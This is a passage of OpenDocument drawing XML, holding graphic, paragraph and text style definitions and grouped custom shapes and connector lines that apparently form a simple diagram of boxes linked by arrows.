      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#ffad2c" draw:fill-gradient-name="Gradient_20_15" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr19" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#ffad2c" draw:fill-gradient-name="Gradient_20_16" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr20" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="none" svg:stroke-color="#000000" draw:fill="none" draw:fill-color="#ffffff" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" draw:auto-grow-height="true" draw:auto-grow-width="false" fo:min-height="0cm" fo:min-width="3.329cm"/>
    </style:style>
    <style:style style:name="gr21" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:marker-start="" draw:marker-end="Arrow" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle"/>
    </style:style>
    <style:style style:name="gr22" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="solid" draw:fill-color="#ff0000" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr23" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:marker-start="Arrow" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle"/>
    </style:style>
    <style:style style:name="gr24" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle"/>
    </style:style>
    <style:style style:name="gr25" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="none" svg:stroke-color="#000000" draw:fill="none" draw:fill-color="#ffffff" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" draw:auto-grow-height="true" draw:auto-grow-width="false" fo:min-height="0.444cm" fo:min-width="1.181cm"/>
    </style:style>
    <style:style style:name="P1" style:family="paragraph">
      <style:paragraph-properties style:writing-mode="lr-tb"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph">
      <style:paragraph-properties fo:text-align="center"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph">
      <style:paragraph-properties fo:text-align="center" style:writing-mode="lr-tb"/>
      <style:text-properties fo:font-size="24pt"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1pt" fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="P6" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
      <style:text-properties fo:color="#000000" fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="P7" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1pt" fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties fo:color="#000000" fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1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office:forms form:automatic-focus="false" form:apply-design-mode="false"/>
        <draw:g>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="1.144cm" svg:height="0.474cm" svg:x="10.72cm" svg:y="10.585cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 860 356" draw:type="non-primitive" draw:enhanced-path="M 0 296 L 580 356 860 59 309 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.362cm" svg:height="0.441cm" svg:x="11.482cm" svg:y="12.261cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 272 332" draw:type="non-primitive" draw:enhanced-path="M 272 53 L 272 0 0 268 4 332 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.463cm" svg:height="1.974cm" svg:x="11.406cm" svg:y="10.658cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 348 1484" draw:type="non-primitive" draw:enhanced-path="M 64 298 L 0 1412 80 1484 348 1209 348 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.749cm" svg:height="0.172cm" svg:x="10.739cm" svg:y="12.541cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 563 129" draw:type="non-primitive" draw:enhanced-path="M 563 129 L 563 61 0 0 0 68 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.782cm" svg:height="1.662cm" svg:x="10.72cm" svg:y="10.979cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 1250" draw:type="non-primitive" draw:enhanced-path="M 588 1250 L 588 57 0 0 0 1194 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="1.149cm" svg:height="0.48cm" svg:x="10.7cm" svg:y="10.564cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 361" draw:type="non-primitive" draw:enhanced-path="M 0 297 L 585 361 864 60 313 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr2" draw:text-style-name="P1" draw:layer="layout" svg:width="0.36cm" svg:height="0.437cm" svg:x="11.468cm" svg:y="12.246cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 271 328" draw:type="non-primitive" draw:enhanced-path="M 271 53 L 271 0 0 268 0 328 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr3" draw:text-style-name="P1" draw:layer="layout" svg:width="0.463cm" svg:height="1.968cm" svg:x="11.386cm" svg:y="10.644cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 348 1480" draw:type="non-primitive" draw:enhanced-path="M 69 301 L 0 1413 79 1480 348 1205 348 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.748cm" svg:height="0.165cm" svg:x="10.72cm" svg:y="12.527cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 562 124" draw:type="non-primitive" draw:enhanced-path="M 562 124 L 562 60 0 0 0 64 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.788cm" svg:height="1.673cm" svg:x="10.7cm" svg:y="10.959cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 592 1258" draw:type="non-primitive" draw:enhanced-path="M 592 1258 L 592 64 0 0 0 1190 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.753cm" svg:height="1.632cm" svg:x="10.72cm" svg:y="10.975cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 566 1227" draw:type="non-primitive" draw:enhanced-path="M 566 1227 L 566 60 0 0 0 1171 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.631cm" svg:height="0.295cm" svg:x="10.775cm" svg:y="11.415cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 475 222" draw:type="non-primitive" draw:enhanced-path="M 475 222 L 475 49 0 0 0 173 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.648cm" svg:height="0.21cm" svg:x="10.769cm" svg:y="11.069cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 487 158" draw:type="non-primitive" draw:enhanced-path="M 487 158 L 487 49 0 0 0 109 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:width="0.631cm" svg:height="0.296cm" svg:x="10.775cm" svg:y="11.68cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 475 223" draw:type="non-primitive" draw:enhanced-path="M 475 223 L 475 50 0 0 0 174 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.618cm" svg:height="0.121cm" svg:x="10.784cm" svg:y="12.397cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 465 91" draw:type="non-primitive" draw:enhanced-path="M 465 91 L 465 53 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.613cm" svg:height="0.106cm" svg:x="10.779cm" svg:y="11.094cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 461 79" draw:type="non-primitive" draw:enhanced-path="M 461 79 L 461 45 0 0 0 30 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.613cm" svg:height="0.11cm" svg:x="10.779cm" svg:y="11.16cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 461 83" draw:type="non-primitive" draw:enhanced-path="M 461 83 L 461 49 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.603cm" svg:height="0.266cm" svg:x="10.789cm" svg:y="11.43cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 453 200" draw:type="non-primitive" draw:enhanced-path="M 453 200 L 453 49 0 0 0 151 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.603cm" svg:height="0.27cm" svg:x="10.789cm" svg:y="11.696cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 453 203" draw:type="non-primitive" draw:enhanced-path="M 453 203 L 453 53 0 0 0 154 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.076cm" svg:height="0.075cm" svg:x="11.316cm" svg:y="12.337cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 57 57" draw:type="non-primitive" draw:enhanced-path="M 57 57 L 57 7 0 0 0 53 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:line draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:x1="3.222cm" svg:y1="10.564cm" svg:x2="10.965cm" svg:y2="10.787cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:x1="2.965cm" svg:y1="12.171cm" svg:x2="10.7cm" svg:y2="11.16cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:x1="3.711cm" svg:y1="13.313cm" svg:x2="10.7cm" svg:y2="11.564cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:x1="4.785cm" svg:y1="13.945cm" svg:x2="10.7cm" svg:y2="11.976cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:x1="6.236cm" svg:y1="14.16cm" svg:x2="10.7cm" svg:y2="12.527cm">
          <text:p/>
        </draw:line>
        <draw:g>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.739cm" svg:height="0.195cm" svg:x="2.59cm" svg:y="9.885cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 826 218" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 167 0 L 826 91 707 218 0 70 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.433cm" svg:height="0.693cm" svg:x="3.222cm" svg:y="10.366cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 485 775" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 775 L 485 245 485 0 224 99 0 524 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.939cm" svg:height="0.363cm" svg:x="2.283cm" svg:y="10.696cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1051 406" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 260 L 1051 406 1051 129 94 0 0 15 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="1.372cm" svg:height="0.601cm" svg:x="2.283cm" svg:y="10.238cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1536 672" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 477 0 L 1536 138 1051 672 0 527 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P1" draw:layer="layout" svg:width="0.646cm" svg:height="0.344cm" svg:x="2.59cm" svg:y="10.366cm">
            <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0" draw:text-style-name="P3" draw:layer="layout" svg:x1="2.478cm" svg:y1="10.025cm" svg:x2="2.552cm" svg:y2="9.946cm">
            <text:p/>
          </draw:line>
          <draw:custom-shape draw:style-name="gr11" draw:text-style-name="P1" draw:layer="layout" svg:width="0.693cm" svg:height="0.685cm" svg:x="2.478cm" svg:y="10.025cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 775 766" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 667 L 775 766 775 103 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.773cm" svg:height="0.171cm" svg:x="2.478cm" svg:y="9.946cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 191" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 74 0 L 864 109 775 191 0 88 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P1" draw:layer="layout" svg:width="0.11cm" svg:height="0.666cm" svg:x="3.215cm" svg:y="9.955cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 124 745" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 124 489 L 8 745 0 143 124 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.082cm" svg:height="0.665cm" svg:x="3.171cm" svg:y="10.043cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 91 743" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 89 646 L 0 743 0 82 91 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr13" draw:text-style-name="P1" draw:layer="layout" svg:width="0.55cm" svg:height="0.49cm" svg:x="2.544cm" svg:y="10.117cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 615 548" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 615 77 L 615 548 0 472 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P1" draw:layer="layout" svg:width="0.526cm" svg:height="0.474cm" svg:x="2.568cm" svg:y="10.12cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 530" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 588 73 L 588 530 0 455 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.074cm" svg:height="0.604cm" svg:x="3.251cm" svg:y="9.96cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 84 676" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 94 L 84 0 78 490 0 676 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.725cm" svg:height="0.148cm" svg:x="2.6cm" svg:y="9.895cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 812 166" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 728 166 L 812 75 137 0 0 59 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr15" draw:text-style-name="P1" draw:layer="layout" svg:width="0.232cm" svg:height="0.034cm" svg:x="2.768cm" svg:y="10.855cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 260 40" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 0 L 0 8 260 40 254 33 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:g>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.777cm" svg:height="0.323cm" svg:x="4.392cm" svg:y="13.555cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 869 361" draw:type="non-primitive" draw:enhanced-path="M 0 302 L 591 361 869 63 314 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.241cm" svg:height="0.301cm" svg:x="4.911cm" svg:y="14.694cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 270 336" draw:type="non-primitive" draw:enhanced-path="M 270 51 L 270 0 0 269 4 336 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.308cm" svg:height="1.342cm" svg:x="4.861cm" svg:y="13.604cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 345 1501" draw:type="non-primitive" draw:enhanced-path="M 64 305 L 0 1431 79 1501 345 1221 345 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.507cm" svg:height="0.112cm" svg:x="4.408cm" svg:y="14.886cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 567 126" draw:type="non-primitive" draw:enhanced-path="M 567 126 L 567 63 0 0 0 68 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.532cm" svg:height="1.132cm" svg:x="4.392cm" svg:y="13.822cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 595 1267" draw:type="non-primitive" draw:enhanced-path="M 595 1267 L 595 62 0 0 0 1207 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.772cm" svg:height="0.312cm" svg:x="4.385cm" svg:y="13.553cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 349" draw:type="non-primitive" draw:enhanced-path="M 0 291 L 583 349 864 51 311 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.246cm" svg:height="0.295cm" svg:x="4.896cm" svg:y="14.682cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 275 331" draw:type="non-primitive" draw:enhanced-path="M 275 57 L 275 0 0 269 6 331 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr17" draw:text-style-name="P1" draw:layer="layout" svg:width="0.315cm" svg:height="1.335cm" svg:x="4.845cm" svg:y="13.598cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 352 1492" draw:type="non-primitive" draw:enhanced-path="M 68 298 L 0 1421 81 1492 352 1212 352 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.51cm" svg:height="0.112cm" svg:x="4.392cm" svg:y="14.874cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 570 125" draw:type="non-primitive" draw:enhanced-path="M 570 125 L 570 59 0 0 0 65 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.53cm" svg:height="1.128cm" svg:x="4.385cm" svg:y="13.814cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 592 1263" draw:type="non-primitive" draw:enhanced-path="M 592 1263 L 592 58 0 0 0 1203 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.513cm" svg:height="1.111cm" svg:x="4.389cm" svg:y="13.822cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 573 1242" draw:type="non-primitive" draw:enhanced-path="M 573 1242 L 573 60 0 0 0 1181 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.429cm" svg:height="0.198cm" svg:x="4.432cm" svg:y="14.119cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 480 222" draw:type="non-primitive" draw:enhanced-path="M 480 222 L 480 51 0 0 0 176 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.432cm" svg:height="0.146cm" svg:x="4.43cm" svg:y="13.886cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 484 163" draw:type="non-primitive" draw:enhanced-path="M 484 163 L 484 48 0 0 0 111 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr16" draw:text-style-name="P1" draw:layer="layout" svg:width="0.429cm" svg:height="0.199cm" svg:x="4.432cm" svg:y="14.301cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 480 222" draw:type="non-primitive" draw:enhanced-path="M 480 222 L 480 43 0 0 0 179 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.416cm" svg:height="0.08cm" svg:x="4.438cm" svg:y="14.786cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 465 89" draw:type="non-primitive" draw:enhanced-path="M 465 89 L 465 54 0 0 0 32 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.417cm" svg:height="0.076cm" svg:x="4.434cm" svg:y="13.899cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 466 85" draw:type="non-primitive" draw:enhanced-path="M 466 85 L 466 52 0 0 0 33 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.417cm" svg:height="0.074cm" svg:x="4.434cm" svg:y="13.945cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 466 82" draw:type="non-primitive" draw:enhanced-path="M 466 82 L 466 49 0 0 0 36 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.407cm" svg:height="0.182cm" svg:x="4.441cm" svg:y="14.128cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 455 203" draw:type="non-primitive" draw:enhanced-path="M 455 203 L 455 51 0 0 0 154 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.407cm" svg:height="0.182cm" svg:x="4.441cm" svg:y="14.31cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 455 204" draw:type="non-primitive" draw:enhanced-path="M 455 204 L 455 50 0 0 0 155 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.054cm" svg:height="0.056cm" svg:x="4.797cm" svg:y="14.745cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 60 63" draw:type="non-primitive" draw:enhanced-path="M 60 63 L 60 8 0 0 0 58 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:g>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.787cm" svg:height="0.332cm" svg:x="2.427cm" svg:y="11.423cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 880 372" draw:type="non-primitive" draw:enhanced-path="M 0 309 L 596 372 880 65 314 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.252cm" svg:height="0.309cm" svg:x="2.95cm" svg:y="12.576cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 281 345" draw:type="non-primitive" draw:enhanced-path="M 281 57 L 281 0 0 277 4 345 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.314cm" svg:height="1.356cm" svg:x="2.902cm" svg:y="11.479cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 352 1518" draw:type="non-primitive" draw:enhanced-path="M 65 304 L 0 1444 81 1518 352 1232 352 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.514cm" svg:height="0.113cm" svg:x="2.439cm" svg:y="12.774cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 576 126" draw:type="non-primitive" draw:enhanced-path="M 576 126 L 576 58 0 0 0 68 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.538cm" svg:height="1.142cm" svg:x="2.427cm" svg:y="11.7cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 602 1278" draw:type="non-primitive" draw:enhanced-path="M 602 1278 L 602 57 0 0 0 1221 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.785cm" svg:height="0.329cm" svg:x="2.42cm" svg:y="11.415cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 878 368" draw:type="non-primitive" draw:enhanced-path="M 0 304 L 593 368 878 61 312 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.251cm" svg:height="0.299cm" svg:x="2.938cm" svg:y="12.57cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 281 334" draw:type="non-primitive" draw:enhanced-path="M 281 47 L 281 0 0 271 7 334 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr19" draw:text-style-name="P1" draw:layer="layout" svg:width="0.318cm" svg:height="1.356cm" svg:x="2.887cm" svg:y="11.466cm">
